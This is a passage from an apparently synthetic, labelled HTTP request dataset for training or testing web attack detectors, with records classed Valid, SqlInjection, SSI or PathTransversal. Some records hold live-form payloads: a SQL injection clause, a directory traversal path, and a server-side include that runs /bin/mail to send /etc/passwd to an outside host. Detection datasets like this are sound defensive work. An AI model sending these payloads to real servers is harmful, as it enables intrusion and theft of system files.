Transfer-Encoding: identity
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 618828001
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 27499
Start - Id: 42303
class: SqlInjection
GET /mzwLnJ2fASlG-d/aRi0WMzOZ1aH-7yO/g5ZAEPZ8C/ejGwQ/sigTt/t0/kQgvpKH1on/qeafat8alusetmji/ieowu9wdtbiyop/ret.css?asOlxyttda=2635265&C-t3l72e0=%27+++++group++by+++users.id++having+619%3D619&AioOeoee=cwe&ntaaije=ro%7Crajpsi&q1ktlihsotc=ybelim7ilot1fnshne&hcdAe5n0et9=efShiso HTTP/1.0
Host: 148.77.76.156
Connection: keep-alive
Accept: text/*, image/jpeg;q=0.4, application/postscript;q=0.1
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-age=12524
Client-ip: 182.139.11.172
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="871"
Date: Fri, 17 Dec 04 17:29:02 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: 2bjxcs=wsw3;ntaora=E4Oor
From: ebsew@sn8ns6e.de
If-Modified-Since: Sat, 29 Nov 08 11:41:34 CET
If-Unmodified-Since: Sun, 13 Jul 08 07:45:24 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Dec 06 23:14:20 CET
Max-Forwards: 2
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: b2tam rguj=eenzIhf
Authorization: icseev sio9et=3tMs
Range: -568889,-588214
Referer: http://www.srEzu.ch/gasm.pdf
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: sneg/9.0.3.1
UA-CPU: Sparc
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: 8.9 www.sdre.tiff, FTP/5.4 www.6e7ilX4i.jpg
Transfer-Encoding: compress
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 74.6.222.203
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42303
Start - Id: 8562
class: Valid
GET /64WeKiDTV-j/ceudret1J4fuweglh/JinqBAU6Swgcstylev/MJbjF-wY6ZtnMhttpsV/oSytocpaqaumTQo/uPrQT3PARKhiAhfA1/oU6KraHDr6w_8Qjo-r/ersehia/g32w/aWB_JhJT_GA2@a.tQ6N.tiff?cdmcscGS=0334795&dewdemao=Pum%25t&9h9=istmpn&eottwYx6leeyrr=424419&hLl6aesm7nobfd=ap&kv=saeke+%3BacuJ&hjanngeicrry=998&8beecdq=ecmdesg&mier6=atErSlbheNhso0ly&pihsruhhrel=f2+dhSdrj HTTP/1.1
Host: 255.170.165.201
Connection: keep-alive
Accept: text/*, text/*;q=0.4
Accept-Charset: isiri-3342;q=0.6, x-mac-arabic;q=0.9, cp-932
Accept-Encoding: identity, identity, deflate, deflate, compress;q=0.6
Accept-Language: Ermrrha9-usodm
Cache-Control: no-transform
Client-ip: 133.24.95.115
Cookie: ecentsxe54riRlp= 1t+w;yljraeesEo=ornn6epUmqfc
Cookie2: $Version="545"
Date: Tue, 04 Jan 05 01:24:16 UTC
ETag: W/"xDX2W8T9A@lrb-.t"
Expect: 100-continue
From: hiao@Soldae.uk
If-Modified-Since: Sun, 19 Aug 07 05:20:18 CET
If-Unmodified-Since: Mon, 30 Aug 04 15:53:38 CET
If-Match: "p_c-boDzHAkmzmbIVyO"
If-None-Match: *
If-Range: Sun, 03 Sep 06 13:25:55 UTC
Max-Forwards: 36
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest qop=8dbndemk
Authorization: NTLM aGZibnR5YWFlYXRveG5kYXMyc3Jhc3JiZWVvdExyeWFIbWhyVG94bmVvZXl0c2k=
Range: 42276-,673-
Referer: http://www.edggo.it/yOr9a.js
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 8.5; en-ht; rv:7.2.2) Gecko/22345435
UA-CPU: Sparc
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 108x957
Via: 9ent/4.4 3.179.110.9
Transfer-Encoding: deflate
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 962 29.200.220.17:9962 "dseiv8noti" 
X-Forwarded-For: 94.123.141.158
X-Serial-Number: 1101244
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8562
Start - Id: 25534
class: Valid
GET /soIi@HgjjZqOWp8grs2u/9VCB/xxRgDR.0etWnAxm/LtelnetfhvO6D5rPjq/ittehhenlutayainh4u/uJi3C/shnns/rathrttsdnnB/body@q0g8VD-Rwg7_.png?trmOxoshao=34396&ns=5&uentcIpubt7=nhtiwYxlYm&gqya3aneog=aet1isw&uae7l3exNd=rwperlwOro&hx4j2kscriptQmO=goon5b3ete6ko&toeeeveth=nkn%24b+hahd%29&unahurn4=dEscnAntt&6hn3Eamtslii2=79&hhpRtnloiysy=iot+s&wnARGB=rKApfd0&2anrda=descwo8IhOjl HTTP/1.1
Host: 111.51.111.212
Connection: keep-alive
Accept: application/*, video/quicktime
Accept-Charset: windows-1254;q=0.3, x-mac-icelandic;q=0.2, gb2312
Accept-Encoding: *
Accept-Language: eba-uoesweea, ruigeybo-e;q=0.6, n-bmcdVeiu;q=0.4, r-oeRs;q=0.0
Cache-Control: no-cache
Client-ip: 248.143.44.71
Cookie: u8fatea=u%;3tiefiumpi5=55823967;te8=0531
Cookie2: $Version="047"
Date: Mon, 22 Jan 07 03:16:52 GMT
ETag: W/"QnmIEfl0nYkxYvxbp"
Expect: 100-continue
From: uamhad@arixey.cz
If-Modified-Since: Sun, 26 Oct 08 11:18:16 GMT
If-Unmodified-Since: Sun, 29 Oct 06 20:51:24 CET
If-Match: "Fha04Iaadjs@gQvl"
If-None-Match: *
If-Range: *
Max-Forwards: 0877
MIME-Version: 1.0
Pragma: iriRSti=2
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: tNar n1eii=rma2
Range: 6863-36,70-
Referer: http://www.Qeoakn.it/paaeei/TorvrrH.shtml
TE: gzip;q=0.4,chunked,trailers
Trailer: Date
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 3.9; ii-ao; rv:8.4.1) Gecko/28237865
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9692x597
Via: 4.6 208.168.251.63, n7etr/1.8 38.232.146.200:57
Transfer-Encoding: gzip
Upgrade: tOa/0.8
Warning: 494 www.nzoiu.gif:0334 "qforxtege5r" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 5960932931614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25534
Start - Id: 34168
class: Valid
POST /oc/ki9iTbKEhAqu.S/efbscv1UydqUJW/etie4tduha2aeoo/eW7A/ttnsesni8nd8uaal/Ef8bdsetc1FSuht4r/lsgGLncC0-/sOn5bnrireesoeiNnbnn.mspx? HTTP/1.0
Content-Length: 246
Content-Language: t9tc7cn
Content-Encoding: identity
Content-Location: http://Elird.be/Raihrres.conf
Content-MD5: YWhlZWNyeG1lbWF3bHBlYg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Fri, 20 Nov 09 05:37:14 GMT
Host: 47.133.250.226
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-8, iso-10646-ucs-2;q=0.7, iso-8859-8;q=0.9, cp-950
Accept-Encoding: identity;q=0.7, deflate, compress, compress
Accept-Language: 1d-p97tau;q=0.4
Cache-Control: no-store
Client-ip: 229.106.129.24
Cookie: WdTVQ26=Ywgetesyis4deeCscriptt2cdocument;bhieFr=einXbXm)8de;xbetweenwmP_=74
Cookie2: $Version="00"
Date: Thu, 11 May 06 13:25:35 CET
ETag: W/"tT2@WS4gO2tZdMlcbNYe"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Sun, 11 Nov 07 03:45:54 GMT
If-Unmodified-Since: Mon, 25 Jun 07 18:01:21 GMT
If-Match: *
If-None-Match: "lL3MMyJI7G5z67QXRR6"
If-Range: Tue, 14 Jul 09 05:36:56 GMT
Max-Forwards: 70
MIME-Version: 8.3
Pragma: mslxj='5rmg'
Proxy-Authorization: Digest username="pcny3"
Authorization: Digest realm
Range: 480-037,1318-,97894-1
Referer: http://www.a9euknp7.fr/AbnErtn/s6lCgo/Mg1lo.php3
TE: trailers,trailers
Trailer: Authorization
User-Agent: tafy (tabUDMvR; 7ecazvs.; mO@kCC)
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 995x590
Via: clRf/4.2 www.PS71Ae.html, ksaov/1.0 55.199.119.189
Transfer-Encoding: deflate
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 124.239.210.255
X-Serial-Number: 8391965
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

oa4rse9EeOoha=3&aSt=tn5CZsteree&Aylaidjjenle=psrai8i4h&t665-XT_XRyD=39917953&Tutzs=ts  oe9scriptna%f=d&qatfoa=oLEZq4l&WZ3Ybu=r&insertiJdI=465117432&PMB1cHkvD=autoexec&ohaht=197608540&ieaE=74&HlBshutdown.R=ew7b39&YsaCdeyhcsn=iaXw&ca0=rt-Vx-Pc-

End - Id: 34168
Start - Id: 40075
class: SSI
GET /gnaDSd/8AwgXselect@k/0pWUHEEebnTUbBeba1Cc/nx5xdhThI/iuQ/passthrulcIxJkugPrNU1T.msf?G@QdJI=te8ZBrmccOo&t3htaa=42&nTucqlysrheoMah=e6df20dYwI5m&soehdYdsnsnr=a&idap=193995964&reee=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fmail+++++esUmhu.com++%3C+++++%2Fetc%2Fpasswd%22--%3E&fsiFanddtszt=l2KzWLP_d&yrese=hEE HTTP/1.0
Host: www.srtniaatat.gov
Connection: YtGyeln
Accept: audio/x-wav;q=0.4, audio/basic
Accept-Charset: shift_jis, iso-8859-2;q=0.0, windows-1255, x-mac-korean;q=0.8, utf-7;q=0.4
Accept-Encoding: 
Accept-Language: iweN6gh-oeap, rCo-qaE2dfla;q=0.6, t6et-etfatahq;q=0.8
Cache-Control: max-stale
Client-ip: 53.190.46.19
Cookie: 1fgdM9c=5316464392;3tssitedeiI=etiziprocessing-instructionkdsrfoc;31=6945;atzj=srKEdqwlfWMd;0Ipnodop=8
Cookie2: $Version="641"
Date: Wed, 25 Jul 07 20:49:10 GMT
ETag: "6MLClxhRoy2z2nIcv"
Expect: fpetd
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Sun, 19 Dec 04 11:02:49 GMT
If-Match: "U_svl4CupDxkcwN"
If-None-Match: *
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 972
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Digest algorithm=MD5
Range: 4-,3-,-4
Referer: /DHFhanep.avi
TE: trailers,trailers,deflate;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (compatible; Konqueror/6.5; WinNT; ey1nett)
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x680
Via: 5.6 22.105.75.198, HTTP/8.3 178.233.163.162, i0ti/5.2 65.50.237.6
Transfer-Encoding: identity
Upgrade: rpmnsn/6.1, yRle/0.9, p0aeh/0.3, onQO/8.1, rauot/8.7
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 44488715
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40075
Start - Id: 11343
class: Valid
GET /f42eQdn/IaieniSnWien8e1.png?execMehc1lE1ks=181&OotEfNanne1Aepl=3G%40R7XduZ61&eiohR=883623&ahe4sttl=s%5DToch&rdwdyRMr5jkhnow=96&osnercrpt=nsOopen8%3BNau50e-&6si9tmjp=%40eform&prrx6rStntbt4I=i HTTP/1.1
Host: www.0a2onteh.net:80
Connection: close
Accept: */*
Accept-Charset: euc-jp
Accept-Encoding: *;q=0.7
Accept-Language: e-7h;q=0.9
Cache-Control: no-store
Client-ip: 60.163.101.113
Cookie: Osirt7tpR=ruwjaXxj;t0-wechobin=f;9haeIaer;a09co=w9wtranhaE
Cookie2: $Version="7"
Date: Mon, 06 Feb 06 21:16:13 GMT
ETag: "n@UUjk1hT0wrlGe8bKt"
Expect: 100-continue
From: ctiZoauS@st4hnahd.ch
If-Modified-Since: Fri, 17 Aug 07 11:11:13 GMT
If-Unmodified-Since: Fri, 25 Sep 09 10:17:44 CET
If-Match: *
If-None-Match: "oaPjQhJkK3HyOA9I_"
If-Range: Thu, 07 Aug 08 22:28:28 GMT
Max-Forwards: 3
MIME-Version: 0.1
Pragma: osBnh='Ss'
Proxy-Authorization: e5muqN iuhhcsn=Srln
Authorization: NTLM dWlrbmFuaWljZWlxaHBEcmV6YTNyc29sbjFudGVkQWVlZHFlZmxoaWFiYXJ3ZW9l
Range: 6-34954,-39546,23644-
Referer: http://www.autoxsce.com/teAth/aPsOae/Entai4q/hseASw.cgi
TE: chunked,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/0.9 (Machintosh; U; PPC Mac OS X 8.5; e6-Rt; rv:9.3.3) Gecko/35867556
UA-CPU: x86
UA-Disp: 139,6791,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 953x845
Via: 6.6 www.tfssn.shtml
Transfer-Encoding: compress
Upgrade: n4e/8.5
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 7492268797432274
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11343
Start - Id: 26053
class: Valid
GET /Xreplace9sytmpXiLb7O7delete/iy2UyYzBEOWs/huI4myne1Cm/tMoygmheteasdnokoo/RNkY/Rn/mQinreec/8UVe@samOlibi4lqpassthruS/tdwbt5Ebl2tenfsleZ/jS_oi-0KZWpO.html?sLelAh5wYci=4310307&0ngrhaxus24=OR+&4I6J3GL_=s.jS%403&iiaHgH4smqtn=%400ede+viohm0htpasscmd%28 HTTP/1.1
Host: www.itnursun.uk
Connection: keep-alive
Accept: application/*, image/*, image/*;q=0.8
Accept-Charset: euc-jp, windows-1253;q=0.9, euc-cn
Accept-Encoding: *;q=0.5
Accept-Language: pcP-t0r
Cache-Control: max-stale
Client-ip: 135.79.240.24
Cookie: LLssrn7atotxt1e=qloY$sendsnwheree;d7d=o7waqtS;2eodum2R=4507;mlrF1dtean4rti=3275634;hr2iotseUo=honu;gsmyteceM=9physlmwdennaue
Cookie2: $Version="5"
Date: Wed, 14 Nov 07 21:49:10 GMT
ETag: W/"iOXgFK0AsIt_gnbb1GhG"
Expect: 100-continue
From: alLeiF@uTy8difar.biz
If-Modified-Since: Mon, 10 Jul 06 06:51:32 GMT
If-Unmodified-Since: Wed, 22 Oct 08 04:29:30 UTC
If-Match: "MYX5qsWCo.be4e@KQM-"
If-None-Match: *
If-Range: *
Max-Forwards: 680
MIME-Version: 4.1
Pragma: t='Dthiac6'
Proxy-Authorization: Digest username="mpdha"
Authorization: Basic ZXRycnk6ZWVlZm10dQ==
Range: 077750-,-78409
Referer: /nHadchw/fno0.jsp
TE: trailers,chunked,trailers
Trailer: Proxy-Authorization
User-Agent: 2edtlTre
UA-CPU: StrongARM
UA-Disp: 889,8239,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 096x0326
Via: 7.5 49.252.131.205, 5.8 www.eiOdtiy.html
Transfer-Encoding: deflate
Upgrade: 33tso/9.6
Warning: 573 248.81.173.161 "hSShBh8osar8mnn" "Thu, 15 Jun 06 19:23:51 CET"
X-Forwarded-For: 217.162.242.84
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26053
Start - Id: 45454
class: PathTransversal
GET /KgselectW5Ak/loe0ouaayM/aLG/e0YZz3Ibeehn/mihtptrslspUo/gsh0ail.gif?vttahsou4iol7h=dlF&59eet=itSkhSt&Xpqkm=n&jXox=507193&b7ohmn7ueEu=nti&csTihcjfl=iphpyn&nEsd=g+&tgsbt516Ea=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Felalanti%2Fesarseri%2Flach%2Folgechnall.mspx&getlmi=a%3BElocationto&acceptpasswdN0UfYc=imjbtosni HTTP/1.0
Host: www.jCetihlb.com:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: k6apta-yioy9eh, rz-d3n;q=0.2, dueji4tm-y0hCurf, yas-Eaa3az4, EtoX2ek-at;q=0.5
Cache-Control: i='okqatao'
Client-ip: 8.98.194.17
Cookie: 0RjMpi=nrndim$=t;it=Xes;Et=)el0oIetae;hontorWani=225673;yias=60
Cookie2: $Version="1"
Date: Sat, 19 Feb 05 16:06:15 CET
ETag: "KhhxyjAs64YdLIzO"
Expect: 100-continue
From: 4e5sen1a@anqM8msGct.ch
If-Modified-Since: Wed, 20 Apr 05 20:52:47 UTC
If-Unmodified-Since: Fri, 01 Sep 06 21:38:03 UTC
If-Match: "DC0vdWRkRIA2BEBp"
If-None-Match: "iYiinQsTzQeL28NRQ"
If-Range: Mon, 23 Nov 09 01:06:43 UTC
Max-Forwards: 8297
Pragma: vds3=agoae
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: NTLM ZWF0ZHJpc25jcHdlbjJnc29kcG1rdVJpZW5laElsYXNJ
Range: -884,93-882862,81022-507
Referer: /5selo/Deb1osw/XsWgsi/Y8btu.tiff
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.6 (X11; U; Open BSD i586 2.6; nR-gt; rv:4.1.2) Gecko/36524445
UA-Disp: 7272,522,16
UA-OS: Windows 95
UA-Color: color8
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: gzip
Upgrade: a5a/5.3
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45454
Start - Id: 21452
class: Valid
GET /gCrPEyNcKQ/ncD/wOh.swf?vsoatetilrtlo1=7FKJkkMR&taae59mdhf5Lta=7365&igbahsisaho=eendunla&pmee91e4daieb=%3Cm6uvn83i%7Cz&umtms0rc=L HTTP/1.1
Host: 18.145.141.216
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: vinynsh-ioEw;q=0.7, zehrdQts-n, Ln-4uxeNo;q=0.4
Cache-Control: evjbjeos=0aemacra
Client-ip: 225.217.176.67
Cookie: fod5oojwqaUa=oECFo2;ec5lttRhorjr=e9a?i5e+4hN-f4;teomn=imuu
Cookie2: $Version="0"
Date: Sat, 14 Jul 07 10:37:54 GMT
ETag: W/"g@T.Lgd__-SLRN0z6@U"
Expect: oteA=anomr
From: eaheebse@4eGrkw.uk
If-Modified-Since: Thu, 25 Oct 07 20:15:26 CET
If-Unmodified-Since: Wed, 14 Oct 09 21:54:41 GMT
If-Match: *
If-None-Match: "k75.NQTjSALi3M."
If-Range: "pJBrAQYY6b7tTqITvIs"
Max-Forwards: 653
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM eXBoc2toeG9BbnRsbGVkZmFiZTJvcnJpTGNyNVljdzJsZW5hdXV1bnJuRTByb0U=
Authorization: NTLM aHI0YWV2dGFFNnJpZzh0a2lmdjBpZHNpZTNteEU4ZWhjbmFkb2luZG1kZUg=
Range: 21333-1766,-00,-67436
Referer: /elmui.ace
TE: trailers
Trailer: TE
User-Agent: ntftoeS/7.2.2.3
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2698x837
Via: 1.4 137.117.149.64, FTP/9.5 www.te1ih.html, eit/2.1 107.220.187.6:65694
Transfer-Encoding: deflate
Upgrade: ree/2.8, tsn/6.2, gd3uq/8.4, 4fta/7.3
Warning: 868 www.psaerr.png "ieSephnp" 
X-Forwarded-For: 153.129.48.252
X-Serial-Number: 53165421880572
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21452
Start - Id: 18799
class: Valid
GET /c9bh4ub/neniemoc6caPoTaourC/obSU/iCu4yhp2S/gcmdn3p8_iT2I/M7ct1iaeealwlbp.html?t2roesl8ti8ms=wp-glhomeopeni&5t8thaajfeed=ehirhA1we&atr=96099&tgnrz=ebpc7iooe&jsae=%7Elnhste0uE HTTP/1.0
Host: 179.143.101.128
Connection: sgra
Accept: */*;q=0.6
Accept-Charset: euc-tw;q=0.5, big5;q=0.5, windows-874
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 175.91.184.33
Cookie: nxsrrnae=tsno4rie;VZHoS=28444
Cookie2: $Version="83"
Date: Mon, 12 Feb 07 02:24:31 CET
ETag: W/"3HCs5i7zVg3zw139a8"
Expect: awm0aS
From: nn9rr@wiueoi.biz
If-Modified-Since: Thu, 25 Nov 04 01:28:52 GMT
If-Unmodified-Since: Wed, 30 Sep 09 12:28:03 GMT
If-Match: *
If-None-Match: *
If-Range: "SQIbDj3G.gg00qXFRF"
Max-Forwards: 2635
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: Digest algorithm=MD5-sess
Range: -26166
Referer: /ejao/opcuzn.jpg
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (X11; U; Solaris 4.4; ih-Dl; rv:1.3.1) Gecko/43387568
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: HTTP/6.5 211.154.181.181, 2.2 30.160.175.78, HTTP/8.3 154.195.202.123
Transfer-Encoding: deflate
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18799
Start - Id: 21727
class: Valid
GET /einaekrcdtlcvnse/8fx4kD7oxwS/aGFQ/4ftpltC4NboHG6.php3?5eitiusot=xtdq3TpthA&5vitoesy2nuomo=ee3emoRt%7Cui&In5om7bn48Nn3=69351140&lsmt=6600377&sne=1747&nrhb3Teroint=cjEUo&eseoE3torlert=dzvDo8n&yltplsrnein=toctsanxynse HTTP/1.0
Host: www.rFnli.st
Connection: close
Accept: video/quicktime, application/zip;q=0.9
Accept-Charset: x-mac-korean, windows-1252;q=0.1, us-ascii
Accept-Encoding: gzip;q=0.8, deflate, compress;q=0.9
Accept-Language: nw-a2e;q=0.4, nabpot-Aefi, 0-Ayromnt, Cx-rasT
Cache-Control: o=0
Client-ip: 48.110.119.188
Cookie: 2eidhtaoP=ft;gnG=4;ffl9o7a=x8I;X-t3Ky8e='psrh
Cookie2: $Version="41"
Date: Sat, 23 Jan 10 17:03:18 GMT
ETag: "PqpR7XP5.GNrKwl-p@r"
Expect: 100-continue
From: atahe4oK@cEwNqe.fr
If-Modified-Since: Sat, 18 Feb 06 07:25:27 UTC
If-Unmodified-Since: Wed, 10 Oct 07 09:55:50 GMT
If-Match: *
If-None-Match: "WmbaO0Czo0y@@FHu2lLn"
If-Range: "fC3jbu-quAcszywUQ6"
Max-Forwards: 6
MIME-Version: 2.5
Pragma: eiecB=o
Proxy-Authorization: NTLM YnhjaXd1Y2VIY3lJbnplcHNpYVRTZnN0ZW5lczNuZHRqMWxlbmZybGl0cw==
Authorization: Basic dGVpV21haDo5cG1yY3c=
Range: 2-286,124579-86667
Referer: /oh3ueish.txt
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: o754Cas
UA-CPU: Sparc
UA-Disp: 079,7856,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 664x378
Via: FTP/2.6 www.ffbwl.gif
Transfer-Encoding: identity
Upgrade: Sih/5.8, znid05/1.0, rex/6.4
Warning: 858 155.233.121.31 "eh8rgnToLeapneiidlmL" "Fri, 04 Apr 08 04:52:56 GMT"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 51402
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21727
Start - Id: 7707
class: Valid
PUT /AgRLOspDHb_hvhM/mg/ctcf4DH/1ccaEdnonamnsz/70eS8rXZB50D6NinCp/vexecmc@5XBAcmdAMfY/dlidasheesieln/ed2ytvsghil.msf? HTTP/1.1
Content-Length: 180
Content-Language: 5ec,a
Content-Encoding: compress
Content-Location: /m6ei/fmsierw/hewMrk/nemu1/doi1.css
Content-MD5: dDFrMEZpN2FsdElxaEVvZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Nov 06 01:01:36 CET
Last-Modified: Sun, 03 Feb 08 16:24:22 UTC
Host: www.wertdtW.it:27
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.5, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 53.244.216.41
Cookie: CAQbgsound7tSDTg3=eeIkfaes9nieea8;osTng=lsrtwmope;oi=9;openmd2Uvar@iPlDG=gei](2rb;oncm1seE5vl=3269998;htattiir2AGhE=ecsCs
Cookie2: $Version="2"
Date: Fri, 19 Mar 04 01:03:55 UTC
ETag: W/"Tf-T-dYsVGH74pjg4"
Expect: abtnrTn=uAtNnm
From: hmytnwrh@n44u6.net
If-Modified-Since: Thu, 23 Jul 09 07:30:01 GMT
If-Unmodified-Since: Sun, 25 Jan 04 01:49:02 GMT
If-Match: ".ckfHdET3uzvySc"
If-None-Match: *
If-Range: Thu, 08 Jun 06 14:32:44 GMT
Max-Forwards: 2309
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM ZVNjaGhjZGlpM3VUUm95ZWUxcmVnQ2tpcG43OFpsZXJudGtyaW5u
Authorization: NTLM Y2llcnRzdGh0ZWNlSWY1c2VvbGVlbU5nZWdoNGF3NG41bm5od2JxdElnb2Ny
Range: 379802-58050
Referer: /etoiba/8bluf/nSpo.pdf
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 0.3; in-oh; rv:2.0.1) Gecko/42303338
UA-CPU: Sparc
UA-Disp: 609,771,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 881x9923
Via: loEbce/9.4 131.119.244.154, 4.3 52.89.24.111:59272
Transfer-Encoding: identity
Upgrade: deV2/0.5, etbro/6.8, Oct1jm/9.8, argnaE/6.4
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 8041864595
----: ----------
~~~~~: ~~~~~~~~~~~~~~

nvazdeHom5s=131&ded=ael&1eeierEirhf9c=9491798&8cOez=53&ap4enbleflres=nnpa&9npVWxA1T.=tmr &w9a9dhhSpveqnMs=duEer1ojor1peti&yeBree=u&OQAtI0i=s0eb8paMnullC&eh=03&pnaflw2bsnoy=08547688

End - Id: 7707
Start - Id: 20100
class: Valid
GET /itvteieUfeedeveAcmg/tpnorehm4cnAele0/ahulhnu/wey4et/2roejia1euyeG2dAtd/ctnoleFceaz/ofd6idvareJeiap/hpvuddFehdautetwe/Oex5/cnsel/ay9VG.dll? HTTP/1.1
Host: 243.48.93.72
Connection: close
Accept: */*;q=0.3
Accept-Charset: koi8;q=0.8, x-mac-roman;q=0.6, euc-jp
Accept-Encoding: compress;q=0.2, identity;q=0.4
Accept-Language: n-mdOsft;q=0.3, loe6tbs-aeepaIh;q=0.6, Bouct-Myonp, il-1l
Cache-Control: no-cache
Client-ip: 89.56.70.121
Cookie: ec=ytur wie)aeu;1m6tedtlosEnrrt=5;sPmrAltTe=oyqi;Unrlnh9yesqd=manttmpmo|w>3i|\toh;ac2pAegliihaMNi=e eiari8lsa;PT45.Omd21hb=07918
Cookie2: $Version="6"
Date: Sun, 23 Sep 07 18:53:18 UTC
ETag: W/"Doc_wnLIk4UP5wAFj"
Expect: i2covij1
From: iextfrn@aRubh8e.biz
If-Modified-Since: Sun, 07 Aug 05 14:12:53 UTC
If-Unmodified-Since: Wed, 14 May 08 07:57:35 CET
If-Match: "vPWjm0nTOtFedxX19cJ1"
If-None-Match: "qftHeJRqfHkaPtnvK39"
If-Range: "GTpceOm3.Q2u07y3"
Max-Forwards: 2379
MIME-Version: 1.4
Pragma: ois=e1T
Proxy-Authorization: Digest nc=Cb8b555d
